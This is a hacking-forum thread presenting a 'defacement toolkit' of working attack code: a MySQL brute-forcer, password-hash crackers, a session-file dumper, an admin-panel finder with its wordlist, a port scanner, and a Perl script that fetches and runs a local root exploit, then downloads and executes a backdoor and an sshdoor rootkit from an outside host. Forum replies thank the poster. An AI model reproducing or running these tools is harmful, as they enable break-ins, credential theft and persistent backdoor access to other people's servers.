toolkit Defacement

Started by _84kur10_, 07 de January , 2010, 12:35:14 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

_84kur10_

Compilação de algumas ferramentas.
Eu tentei o meu melhor para colocar todo o autor ... mas alguns podem não ter PS ... ou estão dentro do código

en ingles pero se entiende...


Mini MySqlat0r

Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.




Prerequisites
The Java runtime environment is necessary to use Mini MySqlat0r :


fuente y de aqui mismo la descargan

http://www.scrt.ch/pages_en/minimysqlator.html



Port Scaner    By _84kur10_ , JxE-13



<?php

define
(NAMEFILE,"ports.html");
if (
$argv[1]==NULL)
{
print 
"
###########     Port Scaner    By _84kur10_ , JxE-13  ##############
#                                                                  #
#        Escaner de puertos                                        #
#        Busca ports open                                  #
#==================================================================#
#  Usage: php Scan.php ip initport eofport                         #
#  M@ndrake Black Team, LatinoHackTeam, Ro0T-MaFia                 #
####################################################################\n\n"
;
die;
}
$init=(int)$argv[2];
$eof =(int)$argv[3];
$ip  =$argv[1];
function 
savePort($info)
{
$fp fopen(NAMEFILE,"ab+");
fwrite($fp,$info."<br>");
fclose($fp);
}
savePort("<br><h1>Resultado de escan para ".$ip."</h1><br>");
savePort("c0ded by _84kur10_, JxE-13 <br>");
print 
"Scaneando...\n";

for (
$i=$init;$i<=$eof;$i++){
$conect=fsockopen($ip$i,$errno$errstr30);
if(
false==$conect)
{
print  
"\nPuerto ".$i." No encontrado\n";
}
else
{
$info"\n\nPuerto ".$i." Fue encontrado Abierto\n";
savePort($info);
print 
$info;
}
}

?>



MySQL Brute Force - Code By JxE-13


<?
# MySQL Brute Force - Code By JxE-13 [ Ro0T-MaFia ]

print ("\n\nMySQL Brute Force - Code By JxE-13 [ Ro0T-MaFia ]\n\n");
print ("Usar MySQL Brute Force Flags\n\n");
printf ("Flags: \n\nHost, Opciones: 0- Brute con Array Default , 1- Brute Generando Aleatorio (Definir Tamaño)\n\n");
if  ($host = $argv[1]==NULL)
{
die;
}
$host = $argv[1];
$opcion = $argv[2];

switch ($opcion)
{
case 0:
$default= @array (`admin`,`webmaster`,`root`,`ODBC`);
$array_n= count($default);
for ($i=0;$i<=$array_n-1;$i++)
{
$conex= mysql_connect ($host,$default[$i],``);
sleep (5);
if ($conex=!mysql_error())
{
print ("\n\nMySQL Server Bruteado\n\nUser:Pass -> $default[$i]\n");
die;
}
}
break;
case 1:
$host = $argv[1];
$opcion = $argv[2];
$caracteres = $argv[3];

while ($conex==false)
{
for ($i=0;$i<=$caracteres;$i++)
{
$c_gene = substr(md5(rand()),0,$caracteres);
$conex= mysql_connect ($host,$c_gene,$c_gene);
sleep (5);
if ($conex=!mysql_error())
{
print ("\n\nMySQL Server Bruteado\n\nUser:Pass -> $c_gene\n");
die;
}
}
}
break;
}

?>


Over SQL InyeX - Code By JxE-13 [ Ro0T - MaFia ]




<?

# Over SQL InyeX - Code By JxE-13 [ Ro0T - MaFia ] - JxE-13@ingenieros.com

#-----
/*

 ::::::::  ::         ::  ::::::::  ::::::               :::::  ::::::::   :::
 ::    ::   ::      ::    :::       :::   :              :::    ::   :::   :::
 ::    ::    ::    ::     ::::::::  :::   :    :::::::   :::::  ::    ::   :::
 ::    ::     :: ::       :::       :: :::                 :::  ::    ::   :::    
 ::::::::       ::        ::::::::  ::: ::::             :::::  :::::::::: :::::::::
 
*/
#-----

class SQl_JxE
{
var $par_get; var $nombre ;

function Parametro_Get ($par_get,$error)
{
#-----
$par_sql= `<? $strin_sql=$_GET[`."`"."$par_get"."`".`]; if (ereg("[^A-Za-z0-9]+",$_REQUEST[`."`"."$par_get"."`".`])) { die ("`."<center><b>$error".`"); } ?>`;  
$nombre= "OverSql.php";
$archivo = fopen ($nombre,`w+`) or die ("<b>Error al Crear");
fwrite ($archivo,$par_sql);
fclose ($archivo);
print ("\nProcesando Los Parametros...");
sleep (5);
print ("\n\nParche Creado -> $nombre");
print ("\n\nTerminado: Incluir -> <? include (`$nombre`); ?> \n\n");

#-----

$this-> Parametro = $par_get;
$this-> Error = $error;
$par_pget=$_GET [$this-> Parametro];
if (ereg("[^A-Za-z0-9]+",$_REQUEST[$this-> Parametro]))
{
die ($this-> Error);
}
}
}

if  ($argv[1]==NULL)
{
die ("\n\nOver SQL InyeX - Code By JxE-13 [ Ro0T - MaFia ]\n\nUsar -> Over SQL InyeX [1]- Parametro Vulnerable [2]- Mensaje de Error \n\n");
}
$Crear = new SQl_JxE;
$Crear ->Parametro_Get ($argv[1],$argv[2]);

?>


Crackeador HTPASSWD 0.1 by Xianur0

  • Ataque de diccionario
  • BruteForce Numerico
  • BruteForce Solo Letras
  • Probar Toda la Tabla Ascii
  • Rango Definido por Usuario


<html>
<head><title>Crackeador HTPASSWD 0.1 by Xianur0</title></head>
<body>
<center><h1>Crackeador HTPASSWD 0.1 by Xianur0<h1></center>
<script type="text/Javascript">function mostrar (postid) { whichpost = document.getElementById(postid);whichpost.className="postshown"; }
function ocultar (postid) { whichpost = document.getElementById(postid);whichpost.className="posthidden"; }
</script><style>.posthidden {display:none} .postshown {display:inline}</style>
<form>
<b>Hash: <input type="text" name="hash"><br>
<span class="posthidden" id="1">Largo Passwords: <input type="text" name="largo"><br></span>
<INPUT ONCLICK="javascript:ocultar(1);" TYPE="RADIO" NAME="tipo" VALUE="1">Ataque de diccionario<BR>
<INPUT ONCLICK="javascript:mostrar(1)" TYPE="RADIO" NAME="tipo" VALUE="2">BruteForce Numerico<BR>
<INPUT ONCLICK="javascript:mostrar(1)" TYPE="RADIO" NAME="tipo" VALUE="3">BruteForce Solo Letras<BR>
<INPUT ONCLICK="javascript:mostrar(1)" TYPE="RADIO" NAME="tipo" VALUE="4">Probar Toda la Tabla Ascii :D<BR>
<INPUT ONCLICK="javascript:mostrar(2); javascript:mostrar(1)" TYPE="RADIO" NAME="tipo" VALUE="5">Rango Definido por Usuario<BR>
<span class="posthidden" id="2">Rango de Caracteres: <input type="text" name="rango" value=`A-z`><br></span>
<input type="submit" value="Crack!">
</form>
<?php
if(isset($_GET[`hash`])) {
set_time_limit(0);
define("hash"$_GET[`hash`]);
define("salt"$_GET[`hash`]{0}.$_GET[`hash`]{1});
define("largo"$_GET[`largo`]);
function 
comprobar($password) {
if(
crypt($passwordsalt) == hash) {die("<br>Password Encontrada: $password");}
}

function 
diccionario() {
$archivo file("db.txt");
foreach(
$archivo as $n=>$pass) {
$pass chop($pass);
print 
comprobar($passsalt);
}
}

function 
generar($inicio$fin) {
$inicio ord($inicio);
$fin ord($fin);
while(
$run != "kill") {
for(
$i=0$i<largo$i++) {
$pass .= chr(rand($inicio$fin));
}
comprobar($pass);
$pass = ``;
}
}

switch (
$_GET[`tipo`]) {
case 
1:
    
diccionario();
    break;
case 
2:
    
generar(09);
    break;
case 
3:
    
generar("A""z");
    break;
case 
4:
    
generar(" ""~");
    break;
case 
5:
    list(
$inicial$final) = explode("-"$_GET[`rango`]);
    
generar($inicial$final);
    break;
}
}
?>

</body>
</html>


solo se le tiene que cambiar el cripto sistema (en vez de la función crypt usar md5, etc...).


Session Master By Xianur0


<html><title>Session Master By Xianur0</title><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center>
<h1>Session Master By Xianur0</h1><br><img alt height="100" src="http://img59.imageshack.us/img59/9729/xianur0oq5.gif" width="100"><br><br><script type="text/Javascript">function expandcollapse (postid) { whichpost = document.getElementById(postid);if (whichpost.className=="postshown") { whichpost.className="posthidden"; } else { whichpost.className="postshown"; } }</script><style>.posthidden {display:none} .postshown {display:inline}</style>


<?php
@session_start();
function 
buscar() {
$tmp = @session_save_path();
print 
"<b>Directory of sessions: $tmp\n</b><br>";
$dir = @opendir($tmp);
while (
$session = @readdir($dir))
{
if(
eregi("sess_",$session)) {
$gestor = @fopen("$tmp/$session""r");
$contenido = @fread($gestorfilesize("$tmp/$session"));
$contenido = @eregi_replace(`;`, ";\n<br><br>Session: "$contenido);
fclose($gestor);
echo 
"<br>".$session."<br>\n";
$i++;
echo `
<a href="javascript:expandcollapse(`.$i.`)">Show/Hide Code</a><br><span class="posthidden" id="`.$i.`">
<br/><table height=1 cellSpacing=0 cellPadding=5 width="100%" bgColor=#FF0000 borderColor=#FF0000 border=1><tr><th>Session: 
`.$contenido.`</th></tr></table></span><br>`;
}
}}
function 
definir() {
$name $_POST[`name`];
$contenido $_POST[`valor`];
$_SESSION[$name] = $contenido;
}

function 
definidos() {
foreach (
$_SESSION as $name => $valor)
{
print 
"<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
}

function 
menu() {
$uri $_SERVER[`REQUEST_URI`];
print 
"<h2>Define SESSION</h2><br><form action=`".$uri."?&action=definir` method=`POST`>Name: <input type=`text` name=`name`><br>Value: <input type=`text` name=`valor`><br><input type=`submit` value=`Set!`></form><h2>Information:</h2><b><a href=`$uri?&action=definidos`>Defined Sessions</a><br><a href=`$uri?&action=buscar`>Sessions On The Server</a><b>";
}

$action $_GET[`action`];


switch (
$action) {
    case 
buscar:
        
buscar();
        break;
    case 
definir:
        
definir();
        break;
    case 
definidos:
        
definidos();
        break;
    default:
        
menu();
        break;
}

?>


Installing rootkit after Rooting


#!/usr/bin/perl -w
#
#
#            program info :
#
#                This Program Is Private
#                Code : perl
#
#
#            Description :
#
#                This Program Can  :
#
#                1:Rooting
#                2:Install Backdoor
#                3:Install Rootkit , After Rooting
#----------------------------------------------------------------------------------+|
print "Enter Password :";
$dl =log <STDIN>;
if ($dl =~ /8.90340751993226/){
print "\t\t[+]--->Viper Auto Rooting<---[+]\n";
print "\t\t[+]-->Coded By Bl4ck.viper<--[+]\n";
print "\t\t[+]--->For My Best Friend<---[+]\n";
   print "[+]Menu :\n";
   print "\t[-]1:Rooting\n";
   print "\t[-]2:install backdoor\n";
   print "\t[-]3:install rootkit , after rooting\n";
   print "\n";
print "Please Select 1,2,3 ? :";
   $userselect = <STDIN>;
 
   if ($userselect==1){&rooting}
 
   if ($userselect==2){&backdoor}
 
   if ($userselect==3){&rootkit}
 
sub rooting
{
print "\t\t[:]Welcome To Rooting Section\n";

   print "Please Insert Localroot Directore [e:g http://www.example.com/localroots]:";
$userdir = <STDIN>;
   print "Please Insert Localroot Name In $userdir Directore [e:g /h00lyshit]:";
$userlocalroot = <STDIN>;
$userdl = $userdir.$userlocalroot;
   print " Your Address Is $userdl ? => y/n :";
       $useraddress = <STDIN>;
       if ($useraddress =~ /y/) {
   print " \tLets Go ...\n";
   if (-x "/usr/bin/wget"){
system ("cd /tmp;mkdir bl4ck.viper;chmod 777 bl4ck.viper;cd bl4ck.viper;wget $userdl;chmod 777 $userlocalroot;./$userlocalroot");
   print "Done!";
system ("id");
}
   else {
   print "Cannot Download Your Local Root With Wget Method !
                     
                       We Are Gonna Use Curl Method ;) \n
       ";
       }
       if (-x "/usr/bin/curl") {
system ("cd /tmp;mkdir bl4ck.viper;chmod 777 bl4ck.viper;cd bl4ck.viper;curl -o userdl;chmod 777 $userlocalroot;./$userlocalroot");
       print "Done!";
system ("id");
       }
       else {
           print "Cannot Download Your Local Root With Curl Method
         
                       We Are Gonna lwp-download Method ;)
       ";
       }
       if (-x "/usr/bin/lwp-download"){
system ("cd /tmp;mkdir bl4ck.viper;chmod 777 bl4ck.viper;cd bl4ck.viper;lwp-download -a userdl;chmod 777 $userlocalroot;./$userlocalroot");
       print "Done!";
system("id");
       }
       else {
           print "Cannot Download Your Local Root With Any Of Method ! :(";
           exit();
       }
       }
 
     
       else {
           if ($useraddress =~ /n/) {
               print "\t\tPlease Repair Address And Try Again ;)"
           }
       }
}

sub backdoor
{
print "\t\t[:]Welcome To Backdoor Section\n";
   print "Are You Ready To Start Install Backdoor ? y/n:";
   $userbss =<STDIN>;
   if ($userbss =~ /y/){
 
   print "\tTest Wget Method ...\n\n";
   if (-x "/usr/bin/wget") {
system ("cd /tmp;mkdir bl4ck.viper-2;chmod 777 bl4ck.viper-2;cd bl4ck.viper-2;wget http://bl4ck-viper.persiangig.com/Toolz/backdoor;chmod 777 backdoor;./backdoor");
   print "Done!";
   print "Can You Cannect To Server With NC At 8000 Port.Port Password Is =hacked";
   }
   else{
       print "Cannot Download Backdoor With Wget Method!
     
                   We Are Gonna Use Curl Method ;)\n";
   }
   if (-x "/usr/bin/curl"){
system ("cd /tmp;mkdir bl4ck.viper-2;chmod 777 bl4ck.viper-2;cd bl4ck.viper-2;curl -o http://bl4ck-viper.persiangig.com/Toolz/backdoor;chmod 777 backdoor;./backdoor");
   print "done!";
   print "Can You Cannect To Server With NC At 8000 Port.Port Password Is ->hacked";
   }
   else {
       print "Cannot Download Backdoor With Curl Method!
     
                   We Are Gonna Use lwp-download Method ;)\n";
   }
   if (-x "/usr/bin/lwp-download"){
system ("cd /tmp;mkdir bl4ck.viper-2;chmod 777 bl4ck.viper-2;cd bl4ck.viper-2;lwp-download -a http://bl4ck-viper.persiangig.com/Toolz/backdoor;chmod 777 backdoor;./backdoor");
   print "Done!";
   print "Can You Cannect To Server With NC At 8000 Port.Port Password Is =hacked";
   }
   else{
       print "Cannot Download Backdoot Whit Any Method :(\n";
   }
   }
   if ($userbss =~ /n/){
       print "OK !";
       exit();
   }
}
sub rootkit
{
print "\t\t[:]Welcome To Rootkit Section\n";
print "Are You Root NOW ? y/n:";
$sr =<STDIN>;
   if($sr =~ /y/){
       print "Please Insert Password For Rootkit:";
       $rp =<STDIN>;
       print "Please Insert Port For Rootkit:";
       $rpo =<STDIN>;
       if(-x "/usr/bin/wget"){
           system ("cd /tmp;wget http://bl4ck-viper.persiangig.com/Toolz/rootkit.tar.gz;chmod 777 rootkit.tar.gz;tar.gz -zxvfw rootkit.tar.gz;cd sshdoor;./install $rp $rpo");
           print "Done!\n";
           print "You Can Connect To Server ;)\n";
       }
       else{
           print "\tCannot Install Rootkit ! Please Check Access Next Install Rootkit\n";
       }
     
   }
   if ($sr =~ /n/){
       print "First Rooting Next Install Rottkit\n";
   }

 
}
}
else {
   print "Password Is Incorrect!"
}





Admin Finder      By _84kur10_



<?php

echo 
"
###########     Admin Finder      By _84kur10_- ############
#                                                          #
#        Buscador de admin logins                          #
#        Automatiza la busqueda de logueos                 #
#                                                          #
#                                                          #
#==========================================================#
#  Usage: php loginFinder.php http://www.website.com       #
#                                                          #
############################################################\n\n"
;
function loadData()
{
$fp "admin.txt";
$strs=file($fp);
return $strs;
}
$admins=loadData();

  foreach($admins as $index => $test)
{

$url=$argv[1].`/`.trim($test);
 if($result=@file_get_contents($url))
 echo "posible logueo encontrado ".$argv[1].`/`.$test;
}



?>




admin.txt

admin1.php
admin1.html
admin2.php
admin2.html
admin.php
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/



Reverse DNS By OzX


<?
//Coded By OzX
//Comunidad Undersecurity.net
#ULTRA MEGA PRIV8 HAX0R MASS HYPER MEGA DELUXE PLUSS CON PUNTOS MASS HAX0R¡¡¡ TOOOLLLL¡¡¡¡ $$$$$$$$
function usage(){
echo "MODO DE USO: > php script.php <host> \n";
echo "php script.php www.google.com\n\n";
exit();
}
function GET($host) {
$cookie = "";
$curl = curl_init();
$header[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
$header[] = "Cache-Control: max-age=0";
$header[] = "Connection: keep-alive";
$header[] = "Keep-Alive: 300";
$header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
$header[] = "Accept-Language: en-us,en;q=0.5";
$header[] = "Pragma: ";
curl_setopt($curl, CURLOPT_URL, "http://onsamehost.com/query.jsp?host=".$host);
curl_setopt($curl, CURLOPT_USERAGENT, `Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4`);
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_REFERER, `http://onsamehost.com/`);
curl_setopt($curl, CURLOPT_ENCODING, `gzip,deflate`);
curl_setopt($curl, CURLOPT_AUTOREFERER, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie);
$html = curl_exec($curl);
curl_close($curl);
return $html;
}

function http($host){
$var = parse_url($host);
if (in_array("http", $var)){
$host = $var[host];
}else{
$host = $var[path];
}
return $host;
}

function valida($host){
echo "[+] HOST : > ".$host."\n";
$ip = gethostbyname($host);
echo  ((ip2long($ip)) === false) ? usage() : "[~] IP Valida \n";
echo "[+] IP :> ".$ip."\n";
return TRUE;
}

function reverse($host){
preg_match_all("/<li>(.*?)<b>\[.*\]<\/b><\/li>/", GET($host), $datos,  PREG_SET_ORDER); //**
$total = count($datos);
if ($total != 0 ){
echo "REVERSE DNS :> ".$total."\n";
for ($x=0;$x<count($datos);$x++){
$data[] = $datos[$x][1]."\r\n";
echo "HOST : > ".$data[$x];
}
echo "[+] HOST Guardados en :> ".$host.".txt\n";
file_put_contents($host.".txt", $data);
}else{
echo "Sin Registros Intente Nuevamente \r\n";
}
}


$host = $argv[1];

echo "[*]Reverse Dns 0.2 By OzX\n";
echo "[*]Foro.Undersecurity.net \n\n";

if (count($argv) == 2 ){
if (valida(http($host)) != FALSE){
reverse($host);
}
}else{
usage();
}

?>


CRACKER  BY D4NB4R


#include <stdio.h>
/* CRACKER  BY D4NB4R
  Pandora`s Box TEAM
d4nb4r[at]hotmail[dot]*/
#define D4NB4R 0x7fffffffL
#define MENOR_VARCH 50
#define MAYOR_VARCH 200
#define MAXIMO_PASS 50

typedef unsigned long var64;
int funcion(int var, var64 var1, var64 var2, int *pross)
{
 int aux,aux1;
 var64 t1, t2, t3, t4, d, d1, d2, d3, d4, x, x1, x2, x3;
 var64 f1[MAXIMO_PASS-2],f2[MAXIMO_PASS-2],f3[MAXIMO_PASS-3],f4[MAXIMO_PASS-3];

 aux=-1;t3=7;f1[0]=1345345333L;f2[0]=0x12345671L;  

 while (1) {
   while (aux < var) {
     aux++;
     pross[aux] = MENOR_VARCH;
     f4[aux]=(f1[aux]&0x3f)+t3;
     f3[aux]=f4[aux]*MENOR_VARCH+(f1[aux] << 8);
     t3+= MENOR_VARCH;f1[aux+1]=f1[aux]^f3[aux];      
     f2[aux+1]=f2[aux]+((f2[aux]<< 8)^f1[aux+1]);}  
     
   d4=f1[aux+1];x=f2[aux+1];    
   t4=(d4& 0x3f)+t3;d2=t4*MENOR_VARCH+(d4<< 8);d3=(x<< 8)^d4;    

   for (aux1=MENOR_VARCH;aux1<=MAYOR_VARCH;aux1++,d2+=t4) {
     x2=x+(d2^d3);x1=d4^d2;x3=(var2 -x2)^(x2<< 8);      
     d1=(x1&0x3f)+t3+aux1;d=((x3^x1)-(x1<< 8))&D4NB4R;      
     if (d%d1!= 0) continue;t1=d/d1;      
     if (t1< MENOR_VARCH ||t1> MAYOR_VARCH) continue;

     d1= (x3&0x3f)+t3+aux1+t1;
     d= ((var1^x3)-(x3<< 8))&D4NB4R;
     if (d%d1!= 0) continue;t2=d/d1;
     
     if (t2<MENOR_VARCH||t2>MAYOR_VARCH) continue;
     pross[aux+1]=aux1;pross[aux+2] =t1;pross[aux+3] =t2;  
     
     return 1;}  

   while(aux>=0&&pross[aux]>=MAYOR_VARCH) {
     t3-= MAYOR_VARCH;
     aux--;}
   
   if (aux<0) break;
   pross[aux]++;f3[aux]+=f4[aux];    
   t3++;
   f1[aux+1]=f1[aux]^f3[aux];
   f2[aux+1]=f2[aux]+((f2[aux]<<8)^f1[aux+1]);}  

 return 0;}

void d4nb4r(char *password){
 int cont,cont1,pass[MAXIMO_PASS];
 var64 t1,t2,t3;  

 if(sscanf(password,"%8lx%lx",&t1,&t2)!=2){
   printf("Hash Incorrecto: %s\n",password);
   return;
 }
 printf("Hash: %08lx%08lx\n",t1,t2);
 t3=t2-t1; t3=t2-((t3<<8)^t1);
 t3=t2-((t3<<8)^t1);t3=t2-((t3<<8)^t1);  

 for(cont1=3;cont1<=MAXIMO_PASS;cont1++) {
   printf("Eatapa.....  %d\n",cont1);
   if(funcion(cont1-4,t1,t3,pass) ) {
     printf("Encontrado : ");
     for(cont=0;cont<cont1;cont++)
     putchar(pass[cont]);
     printf("\n");
     break;}
 }  

 if (cont1>MAXIMO_PASS)
   printf("Password No Encontrado\n");}

int main(int argc, char *argv[])
{
int cont;
printf("Ã&#8240;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;»\n");
   printf("º      Princess I love you        Âº\n");
   printf("º           Club Hacker           º\n");
   printf("º   http://clubhacker.66ghz.com   º\n");
   printf("º           2009-2010             º\n");
   printf("º            D4NB4R               º\n");
   printf("Ã&#710;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;¼\n");
 if (argc<=1)
   printf("Modo de uso  %s hash\n", argv[0]);
 for (cont= 1;cont< argc;cont++)
   d4nb4r(argv[cont]);

 system("PAUSE");
  printf("Ã&#8240;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;»\n");
   printf("º                                 º\n");
   printf("º      Pandora`s Box Team         º\n");
   printf("º   Cracker hecho por D4NB4R      Âº\n");
   printf("º           2009-2010             º\n");
   printf("º    D4NB4R--Princess I love you  Âº\n");
   printf("Ã&#710;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;Ã&#65533;¼\n");
 system("PAUSE");
 return 0;

}






reverse DNS VHoster-v1_0



http://www2.unsec.net/VHoster-v1_0.zip




Binsh#

grande contribuição....  fora o adm finder... isso eu faço com meus metodos... e ele usa uma listinha mesmo... nada inovador nesse ponto... o resto é muito util..

sleeperthree

gracias muy bueno! :D

es muy bienvenido, SALUDOS!

_84kur10_

Quote from: Binsh# on 07 de January , 2010, 02:19:30 PM
grande contribuição....  fora o adm finder... isso eu faço com meus metodos... e ele usa uma listinha mesmo... nada inovador nesse ponto... o resto é muito util..

no te entendi muy bien... pero igual el adminfinder cumple el objetivo de encontrar el admin panel, que el code sea corto no significa que no haga lo que necesitamos... podras verlo en accion en el video que dje

Binsh#

Tampoco entiendo muy bien lo que usted habla ...

Creo que se podría seguir por mi lengua se parece a su lengua.
Ja que a veces no entienden los pequeños detalles, creo que también perdió parte de mi lenguaje
Así que .... GOOGLE Traductor resuelve el problema

lo que quise decir en mi cmentario es que:


lo admin finder no es tan sorprendente en comparación con otras tools
pero el tema es grande con mucha información útil